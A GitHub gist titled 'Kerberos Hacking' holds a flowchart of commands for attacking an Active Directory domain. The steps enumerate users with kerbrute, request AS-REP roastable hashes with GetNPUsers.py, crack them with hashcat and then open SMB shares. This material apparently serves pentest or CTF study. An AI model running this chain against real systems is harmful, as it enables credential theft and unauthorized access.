graph TD
kerberos-hacking-v1
1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
A[is kerberos running? -- typically port 88] --> B
B[find Active Directory domain names] -->|enum4linux $IP| C
C[enumerate AD users] --> |kerbrute userenum --dc $AD-DOMAIN -d $IP /path/to/wordlist.txt| D
D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
G[connect to SMB shares] --> |smbclient -U $AD-DOMAIN/$AD-USER //$IP/$DIR| H
H[look for further data]
Last active
February 26, 2022 15:35
-
-
Save abraidotti/f97c356ed605477bd0ba06ce2190bcbc to your computer and use it in GitHub Desktop.
Kerberos Hacking
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment